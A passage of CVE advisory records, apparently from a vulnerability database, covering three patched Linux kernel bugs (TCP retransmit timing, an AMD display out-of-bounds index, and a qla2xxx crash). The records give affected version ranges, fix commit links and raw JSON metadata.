    "datePublished": "2024-07-29T06:18:12.019Z",
    "dateReserved": "2024-07-12T12:17:45.636Z",
    "dateUpdated": "2025-11-03T22:00:47.849Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-41007 (GCVE-0-2024-41007)

Vulnerability from cvelistv5 – Published: 2024-07-15 08:48 – Updated: 2025-11-03 21:59

Title

tcp: avoid too many retransmit packets

Summary

In the Linux kernel, the following vulnerability has been resolved: tcp: avoid too many retransmit packets If a TCP socket is using TCP_USER_TIMEOUT, and the other peer retracted its window to zero, tcp_retransmit_timer() can retransmit a packet every two jiffies (2 ms for HZ=1000), for about 4 minutes after TCP_USER_TIMEOUT has 'expired'. The fix is to make sure tcp_rtx_probe0_timed_out() takes icsk->icsk_user_timeout into account. Before blamed commit, the socket would not timeout after icsk->icsk_user_timeout, but would use standard exponential backoff for the retransmits. Also worth noting that before commit e89688e3e978 ("net: tcp: fix unexcepted socket die when snd_wnd is 0"), the issue would last 2 minutes instead of 4.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/7bb7670f92bfbd05f…
	https://git.kernel.org/stable/c/d2346fca5bed130dc…
	https://git.kernel.org/stable/c/5d7e64d70a11d9885…
	https://git.kernel.org/stable/c/04317a2471c2f637b…
	https://git.kernel.org/stable/c/e113cddefa27bbf5a…
	https://git.kernel.org/stable/c/dfcdd7f89e401d2c6…
	https://git.kernel.org/stable/c/66cb64a1d2239cd03…
	https://git.kernel.org/stable/c/97a9063518f198ec0…

Impacted products

Vendor

Product

Version

Linux

Affected: b701a99e431db784714c32fc6b68123045714679 , < 7bb7670f92bfbd05fc41a8f9a8f358b7ffed65f4 (git)
Affected: b701a99e431db784714c32fc6b68123045714679 , < d2346fca5bed130dc712f276ac63450201d52969 (git)
Affected: b701a99e431db784714c32fc6b68123045714679 , < 5d7e64d70a11d988553a08239c810a658e841982 (git)
Affected: b701a99e431db784714c32fc6b68123045714679 , < 04317a2471c2f637b4c49cbd0e9c0d04a519f570 (git)
Affected: b701a99e431db784714c32fc6b68123045714679 , < e113cddefa27bbf5a79f72387b8fbd432a61a466 (git)
Affected: b701a99e431db784714c32fc6b68123045714679 , < dfcdd7f89e401d2c6616be90c76c2fac3fa98fde (git)
Affected: b701a99e431db784714c32fc6b68123045714679 , < 66cb64a1d2239cd0309f9b5038b05462570a5be1 (git)
Affected: b701a99e431db784714c32fc6b68123045714679 , < 97a9063518f198ec0adb2ecb89789de342bb8283 (git)

Linux

Affected: 4.19
Unaffected: 0 , < 4.19 (semver)
Unaffected: 4.19.318 , ≤ 4.19.* (semver)
Unaffected: 5.4.280 , ≤ 5.4.* (semver)
Unaffected: 5.10.222 , ≤ 5.10.* (semver)
Unaffected: 5.15.163 , ≤ 5.15.* (semver)
Unaffected: 6.1.100 , ≤ 6.1.* (semver)
Unaffected: 6.6.41 , ≤ 6.6.* (semver)
Unaffected: 6.9.10 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:59:11.582Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7bb7670f92bfbd05fc41a8f9a8f358b7ffed65f4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d2346fca5bed130dc712f276ac63450201d52969"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5d7e64d70a11d988553a08239c810a658e841982"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/04317a2471c2f637b4c49cbd0e9c0d04a519f570"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e113cddefa27bbf5a79f72387b8fbd432a61a466"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/dfcdd7f89e401d2c6616be90c76c2fac3fa98fde"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/66cb64a1d2239cd0309f9b5038b05462570a5be1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/97a9063518f198ec0adb2ecb89789de342bb8283"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41007",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:00:52.460807Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:18.296Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/ipv4/tcp_timer.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "7bb7670f92bfbd05fc41a8f9a8f358b7ffed65f4",
              "status": "affected",
              "version": "b701a99e431db784714c32fc6b68123045714679",
              "versionType": "git"
            },
            {
              "lessThan": "d2346fca5bed130dc712f276ac63450201d52969",
              "status": "affected",
              "version": "b701a99e431db784714c32fc6b68123045714679",
              "versionType": "git"
            },
            {
              "lessThan": "5d7e64d70a11d988553a08239c810a658e841982",
              "status": "affected",
              "version": "b701a99e431db784714c32fc6b68123045714679",
              "versionType": "git"
            },
            {
              "lessThan": "04317a2471c2f637b4c49cbd0e9c0d04a519f570",
              "status": "affected",
              "version": "b701a99e431db784714c32fc6b68123045714679",
              "versionType": "git"
            },
            {
              "lessThan": "e113cddefa27bbf5a79f72387b8fbd432a61a466",
              "status": "affected",
              "version": "b701a99e431db784714c32fc6b68123045714679",
              "versionType": "git"
            },
            {
              "lessThan": "dfcdd7f89e401d2c6616be90c76c2fac3fa98fde",
              "status": "affected",
              "version": "b701a99e431db784714c32fc6b68123045714679",
              "versionType": "git"
            },
            {
              "lessThan": "66cb64a1d2239cd0309f9b5038b05462570a5be1",
              "status": "affected",
              "version": "b701a99e431db784714c32fc6b68123045714679",
              "versionType": "git"
            },
            {
              "lessThan": "97a9063518f198ec0adb2ecb89789de342bb8283",
              "status": "affected",
              "version": "b701a99e431db784714c32fc6b68123045714679",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/ipv4/tcp_timer.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.19"
            },
            {
              "lessThan": "4.19",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.318",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.280",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.222",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.163",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.100",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.41",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.318",
                  "versionStartIncluding": "4.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.280",
                  "versionStartIncluding": "4.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.222",
                  "versionStartIncluding": "4.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "4.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.100",
                  "versionStartIncluding": "4.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.41",
                  "versionStartIncluding": "4.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.10",
                  "versionStartIncluding": "4.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.19",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp: avoid too many retransmit packets\n\nIf a TCP socket is using TCP_USER_TIMEOUT, and the other peer\nretracted its window to zero, tcp_retransmit_timer() can\nretransmit a packet every two jiffies (2 ms for HZ=1000),\nfor about 4 minutes after TCP_USER_TIMEOUT has \u0027expired\u0027.\n\nThe fix is to make sure tcp_rtx_probe0_timed_out() takes\nicsk-\u003eicsk_user_timeout into account.\n\nBefore blamed commit, the socket would not timeout after\nicsk-\u003eicsk_user_timeout, but would use standard exponential\nbackoff for the retransmits.\n\nAlso worth noting that before commit e89688e3e978 (\"net: tcp:\nfix unexcepted socket die when snd_wnd is 0\"), the issue\nwould last 2 minutes instead of 4."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:19:56.819Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/7bb7670f92bfbd05fc41a8f9a8f358b7ffed65f4"
        },
        {
          "url": "https://git.kernel.org/stable/c/d2346fca5bed130dc712f276ac63450201d52969"
        },
        {
          "url": "https://git.kernel.org/stable/c/5d7e64d70a11d988553a08239c810a658e841982"
        },
        {
          "url": "https://git.kernel.org/stable/c/04317a2471c2f637b4c49cbd0e9c0d04a519f570"
        },
        {
          "url": "https://git.kernel.org/stable/c/e113cddefa27bbf5a79f72387b8fbd432a61a466"
        },
        {
          "url": "https://git.kernel.org/stable/c/dfcdd7f89e401d2c6616be90c76c2fac3fa98fde"
        },
        {
          "url": "https://git.kernel.org/stable/c/66cb64a1d2239cd0309f9b5038b05462570a5be1"
        },
        {
          "url": "https://git.kernel.org/stable/c/97a9063518f198ec0adb2ecb89789de342bb8283"
        }
      ],
      "title": "tcp: avoid too many retransmit packets",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41007",
    "datePublished": "2024-07-15T08:48:10.174Z",
    "dateReserved": "2024-07-12T12:17:45.610Z",
    "dateUpdated": "2025-11-03T21:59:11.582Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-41061 (GCVE-0-2024-41061)

Vulnerability from cvelistv5 – Published: 2024-07-29 14:57 – Updated: 2025-05-04 09:21

Title

drm/amd/display: Fix array-index-out-of-bounds in dml2/FCLKChangeSupport

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Fix array-index-out-of-bounds in dml2/FCLKChangeSupport [Why] Potential out of bounds access in dml2_calculate_rq_and_dlg_params() because the value of out_lowest_state_idx used as an index for FCLKChangeSupport array can be greater than 1. [How] Currently dml2 core specifies identical values for all FCLKChangeSupport elements. Always use index 0 in the condition to avoid out of bounds access.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/94166fe12543fbef1…
	https://git.kernel.org/stable/c/0ad4b4a2f6357c45f…

Impacted products

Vendor

Product

Version

Linux

Affected: 7966f319c66d9468623c6a6a017ecbc0dd79be75 , < 94166fe12543fbef122ca2d093e794ea41073a85 (git)
Affected: 7966f319c66d9468623c6a6a017ecbc0dd79be75 , < 0ad4b4a2f6357c45fbe444ead1a929a0b4017d03 (git)

Linux

Affected: 6.7
Unaffected: 0 , < 6.7 (semver)
Unaffected: 6.9.11 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:46:52.669Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/94166fe12543fbef122ca2d093e794ea41073a85"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0ad4b4a2f6357c45fbe444ead1a929a0b4017d03"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41061",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:22:08.835662Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:01.320Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/display/dc/dml2/dml2_utils.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "94166fe12543fbef122ca2d093e794ea41073a85",
              "status": "affected",
              "version": "7966f319c66d9468623c6a6a017ecbc0dd79be75",
              "versionType": "git"
            },
            {
              "lessThan": "0ad4b4a2f6357c45fbe444ead1a929a0b4017d03",
              "status": "affected",
              "version": "7966f319c66d9468623c6a6a017ecbc0dd79be75",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/display/dc/dml2/dml2_utils.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.7"
            },
            {
              "lessThan": "6.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.11",
                  "versionStartIncluding": "6.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Fix array-index-out-of-bounds in dml2/FCLKChangeSupport\n\n[Why]\nPotential out of bounds access in dml2_calculate_rq_and_dlg_params()\nbecause the value of out_lowest_state_idx used as an index for FCLKChangeSupport\narray can be greater than 1.\n\n[How]\nCurrently dml2 core specifies identical values for all FCLKChangeSupport\nelements. Always use index 0 in the condition to avoid out of bounds access."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:21:13.209Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/94166fe12543fbef122ca2d093e794ea41073a85"
        },
        {
          "url": "https://git.kernel.org/stable/c/0ad4b4a2f6357c45fbe444ead1a929a0b4017d03"
        }
      ],
      "title": "drm/amd/display: Fix array-index-out-of-bounds in dml2/FCLKChangeSupport",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41061",
    "datePublished": "2024-07-29T14:57:23.459Z",
    "dateReserved": "2024-07-12T12:17:45.627Z",
    "dateUpdated": "2025-05-04T09:21:13.209Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-42289 (GCVE-0-2024-42289)

Vulnerability from cvelistv5 – Published: 2024-08-17 09:08 – Updated: 2026-01-05 10:52

Title

scsi: qla2xxx: During vport delete send async logout explicitly

Summary

In the Linux kernel, the following vulnerability has been resolved: scsi: qla2xxx: During vport delete send async logout explicitly During vport delete, it is observed that during unload we hit a crash because of stale entries in outstanding command array. For all these stale I/O entries, eh_abort was issued and aborted (fast_fail_io = 2009h) but I/Os could not complete while vport delete is in process of deleting. BUG: kernel NULL pointer dereference, address: 000000000000001c #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 0 P4D 0 Oops: 0000 [#1] PREEMPT SMP NOPTI Workqueue: qla2xxx_wq qla_do_work [qla2xxx] RIP: 0010:dma_direct_unmap_sg+0x51/0x1e0 RSP: 0018:ffffa1e1e150fc68 EFLAGS: 00010046 RAX: 0000000000000000 RBX: 0000000000000021 RCX: 0000000000000001 RDX: 0000000000000021 RSI: 0000000000000000 RDI: ffff8ce208a7a0d0 RBP: ffff8ce208a7a0d0 R08: 0000000000000000 R09: ffff8ce378aac9c8 R10: ffff8ce378aac8a0 R11: ffffa1e1e150f9d8 R12: 0000000000000000 R13: 0000000000000000 R14: ffff8ce378aac9c8 R15: 0000000000000000 FS: 0000000000000000(0000) GS:ffff8d217f000000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 000000000000001c CR3: 0000002089acc000 CR4: 0000000000350ee0 Call Trace: <TASK> qla2xxx_qpair_sp_free_dma+0x417/0x4e0 ? qla2xxx_qpair_sp_compl+0x10d/0x1a0 ? qla2x00_status_entry+0x768/0x2830 ? newidle_balance+0x2f0/0x430 ? dequeue_entity+0x100/0x3c0 ? qla24xx_process_response_queue+0x6a1/0x19e0 ? __schedule+0x2d5/0x1140 ? qla_do_work+0x47/0x60 ? process_one_work+0x267/0x440 ? process_one_work+0x440/0x440 ? worker_thread+0x2d/0x3d0 ? process_one_work+0x440/0x440 ? kthread+0x156/0x180 ? set_kthread_struct+0x50/0x50 ? ret_from_fork+0x22/0x30 </TASK> Send out async logout explicitly for all the ports during vport delete.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/086489256696eb774…
	https://git.kernel.org/stable/c/171ac4b495f9473bc…
	https://git.kernel.org/stable/c/e5ed6a26ffdec0c91…
	https://git.kernel.org/stable/c/b12c54e51ba83c1fb…
	https://git.kernel.org/stable/c/d28a2075bb5304897…
	https://git.kernel.org/stable/c/87c25fcb95aafabb6…
	https://git.kernel.org/stable/c/b35d6d5a2f38605cd…
	https://git.kernel.org/stable/c/76f480d7c717368f2…

Impacted products

Vendor

Product

Version

Linux

Affected: efa93f48fa9d423fda166bc3b6c0cbb09682492e , < 086489256696eb774654a5410e86381c346356fe (git)
Affected: efa93f48fa9d423fda166bc3b6c0cbb09682492e , < 171ac4b495f9473bc134356a00095b47e6409e52 (git)
Affected: efa93f48fa9d423fda166bc3b6c0cbb09682492e , < e5ed6a26ffdec0c91cf0b6138afbd675c00ad5fc (git)
Affected: efa93f48fa9d423fda166bc3b6c0cbb09682492e , < b12c54e51ba83c1fbc619d35083d7872e42ecdef (git)
Affected: efa93f48fa9d423fda166bc3b6c0cbb09682492e , < d28a2075bb530489715a3b011e1dd8765ba20313 (git)
Affected: efa93f48fa9d423fda166bc3b6c0cbb09682492e , < 87c25fcb95aafabb6a4914239f4ab41b07a4f9b7 (git)
Affected: efa93f48fa9d423fda166bc3b6c0cbb09682492e , < b35d6d5a2f38605cddea7d5c64cded894fbe8ede (git)
Affected: efa93f48fa9d423fda166bc3b6c0cbb09682492e , < 76f480d7c717368f29a3870f7d64471ce0ff8fb2 (git)
Affected: 01cda405c88b5ce1ff8c7d4006ec23ade2b0a507 (git)
Affected: 030680c5b21d4ec33234d17503827800e4550345 (git)

Linux

Affected: 4.18
Unaffected: 0 , < 4.18 (semver)
Unaffected: 4.19.320 , ≤ 4.19.* (semver)
Unaffected: 5.4.282 , ≤ 5.4.* (semver)
Unaffected: 5.10.224 , ≤ 5.10.* (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.103 , ≤ 6.1.* (semver)
Unaffected: 6.6.44 , ≤ 6.6.* (semver)
Unaffected: 6.10.3 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42289",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:11:10.283568Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:33:29.913Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:03:43.787Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/scsi/qla2xxx/qla_mid.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "086489256696eb774654a5410e86381c346356fe",
              "status": "affected",
              "version": "efa93f48fa9d423fda166bc3b6c0cbb09682492e",
              "versionType": "git"
            },
            {
              "lessThan": "171ac4b495f9473bc134356a00095b47e6409e52",
              "status": "affected",
              "version": "efa93f48fa9d423fda166bc3b6c0cbb09682492e",
              "versionType": "git"
            },
            {
              "lessThan": "e5ed6a26ffdec0c91cf0b6138afbd675c00ad5fc",
              "status": "affected",
              "version": "efa93f48fa9d423fda166bc3b6c0cbb09682492e",
              "versionType": "git"
            },
            {
              "lessThan": "b12c54e51ba83c1fbc619d35083d7872e42ecdef",
              "status": "affected",
              "version": "efa93f48fa9d423fda166bc3b6c0cbb09682492e",
              "versionType": "git"
            },
            {
              "lessThan": "d28a2075bb530489715a3b011e1dd8765ba20313",
              "status": "affected",
              "version": "efa93f48fa9d423fda166bc3b6c0cbb09682492e",
              "versionType": "git"
            },
            {
              "lessThan": "87c25fcb95aafabb6a4914239f4ab41b07a4f9b7",
              "status": "affected",
              "version": "efa93f48fa9d423fda166bc3b6c0cbb09682492e",
              "versionType": "git"
            },
            {
              "lessThan": "b35d6d5a2f38605cddea7d5c64cded894fbe8ede",
              "status": "affected",
              "version": "efa93f48fa9d423fda166bc3b6c0cbb09682492e",
              "versionType": "git"
            },
            {
              "lessThan": "76f480d7c717368f29a3870f7d64471ce0ff8fb2",
              "status": "affected",
              "version": "efa93f48fa9d423fda166bc3b6c0cbb09682492e",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "01cda405c88b5ce1ff8c7d4006ec23ade2b0a507",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "030680c5b21d4ec33234d17503827800e4550345",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/scsi/qla2xxx/qla_mid.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.18"
            },
            {
              "lessThan": "4.18",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.320",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.282",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.224",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.103",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.44",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.320",
                  "versionStartIncluding": "4.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.282",
                  "versionStartIncluding": "4.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.224",
                  "versionStartIncluding": "4.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "4.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.103",
                  "versionStartIncluding": "4.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.44",
                  "versionStartIncluding": "4.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.3",
                  "versionStartIncluding": "4.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "4.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.14.62",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.17.14",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
